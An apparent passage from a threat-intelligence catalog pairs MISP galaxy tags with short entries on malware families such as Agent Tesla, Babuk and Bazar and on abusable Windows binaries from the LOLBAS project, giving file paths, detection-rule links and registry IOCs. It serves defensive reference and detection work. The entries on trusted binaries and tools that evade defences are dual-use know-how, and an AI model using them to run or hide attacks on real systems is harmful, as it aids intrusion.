This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Utility for installing software and drivers with rundll32.exe

Author: LOLBAS Team

Paths: * c:\windows\system32\advpack.dll * c:\windows\syswow64\advpack.dll

Detection: * Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml) * Splunk: [detect_rundll32_application_control_bypass_advpack.yml]([Advpack.dll - LOLBAS Project(/references/837ccb3c-316d-4d96-8a33-b5df40870aba)]</sup>

The tag is: misp-galaxy:software="Advpack"

AZZY - Associated Software

The tag is: misp-galaxy:software="AZZY - Associated Software"

EVILTOSS - Associated Software

The tag is: misp-galaxy:software="EVILTOSS - Associated Software"

NETUI - Associated Software

The tag is: misp-galaxy:software="NETUI - Associated Software"

Sedreco - Associated Software

The tag is: misp-galaxy:software="Sedreco - Associated Software"

ADVSTORESHELL

[ADVSTORESHELL](https://app.tidalcyber.com/software/ef7f4f5f-6f30-4059-87d1-cd8375bf1bee) is a spying backdoor that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. <sup>[[Kaspersky Sofacy](https://app.tidalcyber.com/references/46226f98-c762-48e3-9bcd-19ff14184bb5)]</sup> <sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup>

The tag is: misp-galaxy:software="ADVSTORESHELL"

Agent.btz

[Agent.btz](https://app.tidalcyber.com/software/f27c9a91-c618-40c6-837d-089ba4d80f45) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. <sup>[[Securelist Agent.btz](https://app.tidalcyber.com/references/3b876c56-1d18-49e3-9a96-5cee4af7ab72)]</sup>

The tag is: misp-galaxy:software="Agent.btz"

AgentExecutor.exe - Associated Software

<sup>[[AgentExecutor.exe - LOLBAS Project](/references/633d7f25-df9d-4619-9aa9-92d1d9d225d7)]</sup>

The tag is: misp-galaxy:software="AgentExecutor.exe - Associated Software"

AgentExecutor

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Intune Management Extension included on Intune Managed Devices

Author: Eleftherios Panos

Paths: * C:\Program Files (x86)\Microsoft Intune Management Extension

Resources:

Detection: * Sigma: [proc_creation_win_lolbin_agentexecutor.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml) * Sigma: [proc_creation_win_lolbin_agentexecutor_susp_usage.yml]([AgentExecutor.exe - LOLBAS Project(/references/633d7f25-df9d-4619-9aa9-92d1d9d225d7)]</sup>

The tag is: misp-galaxy:software="AgentExecutor"

Agent Tesla

[Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.<sup>[[Fortinet Agent Tesla April 2018](https://app.tidalcyber.com/references/86a65be7-0f70-4755-b526-a26b92eabaa2)]</sup><sup>[[Bitdefender Agent Tesla April 2020](https://app.tidalcyber.com/references/e3d932fc-0148-43b9-bcc7-971dd7ba3bf8)]</sup><sup>[[Malwarebytes Agent Tesla April 2020](https://app.tidalcyber.com/references/87f4fe4c-54cd-40a7-938b-6e6f6d2efbea)]</sup>

The tag is: misp-galaxy:software="Agent Tesla"

Amadey

[Amadey](https://app.tidalcyber.com/software/f173ec20-ef40-436b-a859-fef017e1e767) is a Trojan bot that has been used since at least October 2018.<sup>[[Korean FSI TA505 2020](https://app.tidalcyber.com/references/d4e2c109-341c-45b3-9d41-3eb980724524)]</sup><sup>[[BlackBerry Amadey 2020](https://app.tidalcyber.com/references/21b7a7c7-55a2-4235-ba11-d34ba68d1bf5)]</sup>

The tag is: misp-galaxy:software="Amadey"

Anchor_DNS - Associated Software

The tag is: misp-galaxy:software="Anchor_DNS - Associated Software"

Anchor

[Anchor](https://app.tidalcyber.com/software/9521c535-1043-4b82-ba5d-e5eaeca500ee) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) on selected high profile targets since at least 2018.<sup>[[Cyberreason Anchor December 2019](https://app.tidalcyber.com/references/a8dc5598-9963-4a1d-a473-bee8d2c72c57)]</sup><sup>[[Medium Anchor DNS July 2020](https://app.tidalcyber.com/references/de246d53-385f-44be-bf0f-25a76442b835)]</sup>

The tag is: misp-galaxy:software="Anchor"

ANDROMEDA

[ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) is commodity malware that was widespread in the early 2010’s and continues to be observed in infections across a wide variety of industries. During the 2022 [C0026](https://app.tidalcyber.com/campaigns/41f283a1-b2ac-547d-98d5-ff907afd08c7) campaign, threat actors re-registered expired [ANDROMEDA](https://app.tidalcyber.com/software/69aac793-9e6a-5167-bc62-823189ee2f7b) C2 domains to spread malware to select targets in Ukraine.<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:software="ANDROMEDA"

AnyDesk

AnyDesk is a tool used to enable remote connections to network devices.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="AnyDesk"

AppInstaller.exe - Associated Software

<sup>[[AppInstaller.exe - LOLBAS Project](/references/9a777e7c-e76c-465c-8b45-67503e715f7e)]</sup>

The tag is: misp-galaxy:software="AppInstaller.exe - Associated Software"

AppInstaller

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Tool used for installation of AppX/MSIX applications on Windows 10

Author: Wade Hickey

Paths: * C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Detection: * Sigma: [dns_query_win_lolbin_appinstaller.yml]([AppInstaller.exe - LOLBAS Project(/references/9a777e7c-e76c-465c-8b45-67503e715f7e)]</sup>

The tag is: misp-galaxy:software="AppInstaller"

AppleJeus

[AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://app.tidalcyber.com/software/cdeb3110-07e5-4c3d-9eef-e6f2b760ef33) has been used to distribute the [FALLCHILL](https://app.tidalcyber.com/software/ea47f1fd-0171-4254-8c92-92b7a5eec5e1) RAT.<sup>[[CISA AppleJeus Feb 2021](https://app.tidalcyber.com/references/6873e14d-eba4-4e3c-9ccf-cec1d760f0be)]</sup>

The tag is: misp-galaxy:software="AppleJeus"

AppleSeed

[AppleSeed](https://app.tidalcyber.com/software/9df2e42e-b454-46ea-b50d-2f7d999f3d42) is a backdoor that has been used by [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) to target South Korean government, academic, and commercial targets since at least 2021.<sup>[[Malwarebytes Kimsuky June 2021](https://app.tidalcyber.com/references/9a497c56-f1d3-4889-8c1a-14b013f14668)]</sup>

The tag is: misp-galaxy:software="AppleSeed"

Appvlp.exe - Associated Software

<sup>[[Appvlp.exe - LOLBAS Project](/references/b0afe3e8-9f1d-4295-8811-8dfbe993c337)]</sup>

The tag is: misp-galaxy:software="Appvlp.exe - Associated Software"

Appvlp

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Application Virtualization Utility Included with Microsoft Office 2016

Author: Oddvar Moe

Paths: * C:\Program Files\Microsoft Office\root\client\appvlp.exe * C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe

Detection: * Sigma: [proc_creation_win_lolbin_appvlp.yml]([Appvlp.exe - LOLBAS Project(/references/b0afe3e8-9f1d-4295-8811-8dfbe993c337)]</sup>

The tag is: misp-galaxy:software="Appvlp"

Aria-body

The tag is: misp-galaxy:software="Aria-body"

arp.exe - Associated Software

The tag is: misp-galaxy:software="arp.exe - Associated Software"

Arp

[Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e) displays and modifies information about a system’s Address Resolution Protocol (ARP) cache. <sup>[[TechNet Arp](https://app.tidalcyber.com/references/7714222e-8046-4884-b460-493d9ef46305)]</sup>

The tag is: misp-galaxy:software="Arp"

Aspnet_Compiler.exe - Associated Software

<sup>[[Aspnet_Compiler.exe - LOLBAS Project](/references/15864c56-115e-4163-b816-03bdb9bfd5c5)]</sup>

The tag is: misp-galaxy:software="Aspnet_Compiler.exe - Associated Software"

Aspnet_Compiler

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: ASP.NET Compilation Tool

Author: Jimmy (@bohops)

Paths: * c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe * c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

The tag is: misp-galaxy:software="Aspnet_Compiler"

ASPXTool - Associated Software

The tag is: misp-galaxy:software="ASPXTool - Associated Software"

ASPXSpy

[ASPXSpy](https://app.tidalcyber.com/software/a0cce010-9158-45e5-978a-f002e5c31a03) is a Web shell. It has been modified by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) actors to create the ASPXTool version. <sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup>

The tag is: misp-galaxy:software="ASPXSpy"

Guildma - Associated Software

<sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup>

The tag is: misp-galaxy:software="Guildma - Associated Software"

Astaroth

[Astaroth](https://app.tidalcyber.com/software/ea719a35-cbe9-4503-873d-164f68ab4544) is a Trojan and information stealer known to affect companies in Europe, Brazil, and throughout Latin America. It has been known publicly since at least late 2017. <sup>[[Cybereason Astaroth Feb 2019](https://app.tidalcyber.com/references/eb4dc1f8-c6e7-4d6c-9258-b03a0ae64d2e)]</sup><sup>[[Cofense Astaroth Sept 2018](https://app.tidalcyber.com/references/d316c581-646d-48e7-956e-34e2f957c67d)]</sup><sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup>

The tag is: misp-galaxy:software="Astaroth"

AsyncRAT

[AsyncRAT](https://app.tidalcyber.com/software/d587efff-4699-51c7-a4cc-bdbd1b302ed4) is an open-source remote access tool originally available through the NYANxCAT Github repository that has been used in malicious campaigns.<sup>[[Morphisec Snip3 May 2021](https://app.tidalcyber.com/references/abe44c50-8347-5c98-8b04-d41afbe59d4c)]</sup><sup>[[Cisco Operation Layover September 2021](https://app.tidalcyber.com/references/f19b4bd5-99f9-54c0-bffe-cc9c052aea12)]</sup><sup>[[Telefonica Snip3 December 2021](https://app.tidalcyber.com/references/f026dd44-1491-505b-8a8a-e4f28c6cd6a7)]</sup>

The tag is: misp-galaxy:software="AsyncRAT"

at.exe - Associated Software

The tag is: misp-galaxy:software="at.exe - Associated Software"

at

The tag is: misp-galaxy:software="at"

Atbroker.exe - Associated Software

<sup>[[Atbroker.exe - LOLBAS Project](/references/b0c21b56-6591-49c3-8e67-328ddb7b436d)]</sup>

The tag is: misp-galaxy:software="Atbroker.exe - Associated Software"

Atbroker

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Helper binary for Assistive Technology (AT)

Author: Oddvar Moe

Paths: * C:\Windows\System32\Atbroker.exe * C:\Windows\SysWOW64\Atbroker.exe

Detection: * Sigma: [proc_creation_win_lolbin_susp_atbroker.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml) * Sigma: [registry_event_susp_atbroker_change.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml) * IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration * IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs * IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware<sup>[[Atbroker.exe - LOLBAS Project](/references/b0c21b56-6591-49c3-8e67-328ddb7b436d)]</sup>

The tag is: misp-galaxy:software="Atbroker"

Atera Agent

Atera Agent is a legitimate remote administration tool (specifically a remote management and maintenance ("RMM") solution) that adversaries have used as a command and control tool for remote code execution, tool ingress, and persisting in victim environments.<sup>[[U.S. CISA PaperCut May 2023](/references/b5ef2b97-7cc7-470b-ae97-a45dc4af32a6)]</sup>

The tag is: misp-galaxy:software="Atera Agent"

Attor

[Attor](https://app.tidalcyber.com/software/89c35e9f-b435-4f58-9073-f24c1ee8754f) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://app.tidalcyber.com/software/89c35e9f-b435-4f58-9073-f24c1ee8754f) has a loadable plugin architecture to customize functionality for specific targets.<sup>[[ESET Attor Oct 2019](https://app.tidalcyber.com/references/fdd57c56-d989-4a6f-8cc5-5b3713605dec)]</sup>

The tag is: misp-galaxy:software="Attor"

Roptimizer - Associated Software

The tag is: misp-galaxy:software="Roptimizer - Associated Software"

AuditCred

[AuditCred](https://app.tidalcyber.com/software/d0c25f14-5eb3-40c1-a890-2ab1349dff53) is a malicious DLL that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) during their 2018 attacks.<sup>[[TrendMicro Lazarus Nov 2018](https://app.tidalcyber.com/references/4c697316-c13a-4243-be18-c0e059e4168c)]</sup>

The tag is: misp-galaxy:software="AuditCred"

AutoIt backdoor

[AutoIt backdoor](https://app.tidalcyber.com/software/3f927596-5219-49eb-bd0d-57068b0e04ed) is malware that has been used by the actors responsible for the MONSOON campaign. The actors frequently used it in weaponized .pps files exploiting CVE-2014-6352. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup> This malware makes use of the legitimate scripting language for Windows GUI automation with the same name.

The tag is: misp-galaxy:software="AutoIt backdoor"

AuTo Stealer

[AuTo Stealer](https://app.tidalcyber.com/software/649a4cfc-c0d0-412d-a28c-1bd4ed604ea8) is malware written in C++ has been used by [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) since at least December 2021 to target government agencies and personnel in India and Afghanistan.<sup>[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]</sup>

The tag is: misp-galaxy:software="AuTo Stealer"

Avaddon

[Avaddon](https://app.tidalcyber.com/software/bad92974-35f6-4183-8024-b629140c6ee6) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.<sup>[[Awake Security Avaddon](https://app.tidalcyber.com/references/c113cde7-5dd5-45e9-af16-3ab6ed0b1728)]</sup><sup>[[Arxiv Avaddon Feb 2021](https://app.tidalcyber.com/references/dbee8e7e-f477-4bd5-8225-84e0e222617e)]</sup>

The tag is: misp-galaxy:software="Avaddon"

Avenger

The tag is: misp-galaxy:software="Avenger"

AvosLocker

[AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://app.tidalcyber.com/software/e792dc8d-b0f4-5916-8850-a61ff53125d0) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.<sup>[[Malwarebytes AvosLocker Jul 2021](https://app.tidalcyber.com/references/88dffb14-a7a7-5b36-b269-8283dec0f1a3)]</sup><sup>[[Trend Micro AvosLocker Apr 2022](https://app.tidalcyber.com/references/01fdc732-0951-59e2-afaf-5fe761357e7f)]</sup><sup>[[Joint CSA AvosLocker Mar 2022](https://app.tidalcyber.com/references/8ad57a0d-d74f-5802-ab83-4ddac1beb083)]</sup>

The tag is: misp-galaxy:software="AvosLocker"

Azorult

[Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) has been observed in the wild as early as 2016. In July 2018, [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://app.tidalcyber.com/software/cc68a7f0-c955-465f-bee0-2dacbb179078) has been seen used for cryptocurrency theft. <sup>[[Unit42 Azorult Nov 2018](https://app.tidalcyber.com/references/44ceddf6-bcbf-4a60-bb92-f8cdc675d185)]</sup><sup>[[Proofpoint Azorult July 2018](https://app.tidalcyber.com/references/a85c869a-3ba3-42c2-9460-d3d1f0874044)]</sup>

The tag is: misp-galaxy:software="Azorult"

Babyk - Associated Software

<sup>[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)]</sup><sup>[[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)]</sup><sup>[[Trend Micro Ransomware February 2021](https://app.tidalcyber.com/references/64a86a3f-0160-4766-9ac1-7d287eb2c323)]</sup>

The tag is: misp-galaxy:software="Babyk - Associated Software"

Vasa Locker - Associated Software

The tag is: misp-galaxy:software="Vasa Locker - Associated Software"

Babuk

[Babuk](https://app.tidalcyber.com/software/0dc07eb9-66df-4116-b1bc-7020ca6395a1) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://app.tidalcyber.com/software/0dc07eb9-66df-4116-b1bc-7020ca6395a1) employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.<sup>[[Sogeti CERT ESEC Babuk March 2021](https://app.tidalcyber.com/references/e85e3bd9-6ddc-4d0f-a16c-b525a75baa7e)]</sup><sup>[[McAfee Babuk February 2021](https://app.tidalcyber.com/references/bb23ca19-78bb-4406-90a4-bf82bd467e04)]</sup><sup>[[CyberScoop Babuk February 2021](https://app.tidalcyber.com/references/0a0aeacd-0976-4c84-b40d-5704afca9f0e)]</sup>

The tag is: misp-galaxy:software="Babuk"

BabyShark

[BabyShark](https://app.tidalcyber.com/software/ebb824a2-abff-4bfd-87f0-d63cb02b62e6) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. <sup>[[Unit42 BabyShark Feb 2019](https://app.tidalcyber.com/references/634404e3-e2c9-4872-a280-12d2be168cba)]</sup>

The tag is: misp-galaxy:software="BabyShark"

BackConfig

The tag is: misp-galaxy:software="BackConfig"

Havex - Associated Software

The tag is: misp-galaxy:software="Havex - Associated Software"

Backdoor.Oldrea

[Backdoor.Oldrea](https://app.tidalcyber.com/software/f7cc5974-767c-4cb4-acc7-36295a386ce5) is a modular backdoor that used by [Dragonfly](https://app.tidalcyber.com/groups/472080b0-e3d4-4546-9272-c4359fe856e1) against energy companies since at least 2013. [Backdoor.Oldrea](https://app.tidalcyber.com/software/f7cc5974-767c-4cb4-acc7-36295a386ce5) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.<sup>[[Symantec Dragonfly](https://app.tidalcyber.com/references/9514c5cd-2ed6-4dbf-aa9e-1c425e969226)]</sup><sup>[[Gigamon Berserk Bear October 2021](https://app.tidalcyber.com/references/06b6cbe3-8e35-4594-b36f-76b503c11520)]</sup><sup>[[Symantec Dragonfly Sept 2017](https://app.tidalcyber.com/references/11bbeafc-ed5d-4d2b-9795-a0a9544fb64e)]</sup>

The tag is: misp-galaxy:software="Backdoor.Oldrea"

Lecna - Associated Software

The tag is: misp-galaxy:software="Lecna - Associated Software"

BACKSPACE

The tag is: misp-galaxy:software="BACKSPACE"

Backstab

Backstab is a tool used to terminate antimalware-protected processes.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Backstab"

BADCALL

The tag is: misp-galaxy:software="BADCALL"

BADFLICK

[BADFLICK](https://app.tidalcyber.com/software/8c454294-81cb-45d0-b299-818994ad3e6f) is a backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.<sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup><sup>[[Accenture MUDCARP March 2019](https://app.tidalcyber.com/references/811d433d-27a4-4411-8ec9-b3a173ba0033)]</sup>

The tag is: misp-galaxy:software="BADFLICK"

BADHATCH

[BADHATCH](https://app.tidalcyber.com/software/16481e0f-49d5-54c1-a1fe-16d9e7f8d08c) is a backdoor that has been utilized by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) since at least 2019. [BADHATCH](https://app.tidalcyber.com/software/16481e0f-49d5-54c1-a1fe-16d9e7f8d08c) has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.<sup>[[Gigamon BADHATCH Jul 2019](https://app.tidalcyber.com/references/69a45479-e982-58ee-9e2d-caaf825f0ad4)]</sup><sup>[[BitDefender BADHATCH Mar 2021](https://app.tidalcyber.com/references/958cfc9a-901c-549d-96c2-956272b240e3)]</sup>

The tag is: misp-galaxy:software="BADHATCH"

BADNEWS

[BADNEWS](https://app.tidalcyber.com/software/34c24d27-c779-42a4-9f61-3f0d3fea6fd4) is malware that has been used by the actors responsible for the [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. <sup>[[Forcepoint Monsoon](https://app.tidalcyber.com/references/ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e)]</sup> <sup>[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]</sup>

The tag is: misp-galaxy:software="BADNEWS"

BadPatch

[BadPatch](https://app.tidalcyber.com/software/10e76722-4b52-47f6-9276-70e95fecb26b) is a Windows Trojan that was used in a Gaza Hackers-linked campaign.<sup>[[Unit 42 BadPatch Oct 2017](https://app.tidalcyber.com/references/9c294bf7-24ba-408a-90b8-5b9885838e1b)]</sup>

The tag is: misp-galaxy:software="BadPatch"

Win32/Diskcoder.D - Associated Software

The tag is: misp-galaxy:software="Win32/Diskcoder.D - Associated Software"

Bad Rabbit

[Bad Rabbit](https://app.tidalcyber.com/software/a1d86d8f-fa48-43aa-9833-7355750e455c) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://app.tidalcyber.com/software/a1d86d8f-fa48-43aa-9833-7355750e455c) has also targeted organizations and consumers in Russia. <sup>[[Secure List Bad Rabbit](https://app.tidalcyber.com/references/f4cec03a-ea94-4874-9bea-16189e967ff9)]</sup><sup>[[ESET Bad Rabbit](https://app.tidalcyber.com/references/a9664f01-78f0-4461-a757-12f54ec99a56)]</sup><sup>[[Dragos IT ICS Ransomware](https://app.tidalcyber.com/references/60187301-8d70-4023-8e6d-59cbb1468f0d)]</sup>

The tag is: misp-galaxy:software="Bad Rabbit"

Bandook

[Bandook](https://app.tidalcyber.com/software/5c0f8c35-88ff-40a1-977a-af5ce534e932) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://app.tidalcyber.com/software/5c0f8c35-88ff-40a1-977a-af5ce534e932) has been used by [Dark Caracal](https://app.tidalcyber.com/groups/7ad94dbf-9909-42dd-8b62-a435481bdb14), as well as in a separate campaign referred to as "Operation Manul".<sup>[[EFF Manul Aug 2016](https://app.tidalcyber.com/references/311a3863-3897-4ddf-a251-d0467a56675f)]</sup><sup>[[Lookout Dark Caracal Jan 2018](https://app.tidalcyber.com/references/c558f5db-a426-4041-b883-995ec56e7155)]</sup><sup>[[CheckPoint Bandook Nov 2020](https://app.tidalcyber.com/references/352652a9-86c9-42e1-8ee0-968180c6a51e)]</sup>

The tag is: misp-galaxy:software="Bandook"

Trojan Manuscript - Associated Software

The tag is: misp-galaxy:software="Trojan Manuscript - Associated Software"

Bankshot

[Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) used the [Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293) implant in attacks against the Turkish financial sector. <sup>[[McAfee Bankshot](https://app.tidalcyber.com/references/c748dc6c-8c19-4a5c-840f-3d47955a6c78)]</sup>

The tag is: misp-galaxy:software="Bankshot"

Bash.exe - Associated Software

<sup>[[Bash.exe - LOLBAS Project](/references/7d3efbc7-6abf-4f3f-aec8-686100bb90ad)]</sup>

The tag is: misp-galaxy:software="Bash.exe - Associated Software"

Bash

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: File used by Windows subsystem for Linux

Author: Oddvar Moe

Paths: * C:\Windows\System32\bash.exe * C:\Windows\SysWOW64\bash.exe

The tag is: misp-galaxy:software="Bash"

Bat Armor

Bat Armor is a tool used to generate .bat files using PowerShell scripts.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Bat Armor"

Team9 - Associated Software

The tag is: misp-galaxy:software="Team9 - Associated Software"

KEGTAP - Associated Software

<sup>[[FireEye KEGTAP SINGLEMALT October 2020](https://app.tidalcyber.com/references/59162ffd-cb95-4757-bb1e-0c2a4ad5c083)]</sup><sup>[[CrowdStrike Wizard Spider October 2020](https://app.tidalcyber.com/references/5c8d67ea-63bc-4765-b6f6-49fa5210abe6)]</sup>

The tag is: misp-galaxy:software="KEGTAP - Associated Software"

Bazar

[Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) reportedly has ties to [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.<sup>[[Cybereason Bazar July 2020](https://app.tidalcyber.com/references/8819875a-5139-4dae-94c8-e7cc9f847580)]</sup>

The tag is: misp-galaxy:software="Bazar"

BBK

The tag is: misp-galaxy:software="BBK"

BBSRAT

[BBSRAT](https://app.tidalcyber.com/software/be4dab36-d499-4ac3-b204-5e309e3a5331) is malware with remote access tool functionality that has been used in targeted compromises. <sup>[[Palo Alto Networks BBSRAT](https://app.tidalcyber.com/references/8c5d61ba-24c5-4f6c-a208-e0a5d23ebb49)]</sup>

The tag is: misp-galaxy:software="BBSRAT"

BendyBear

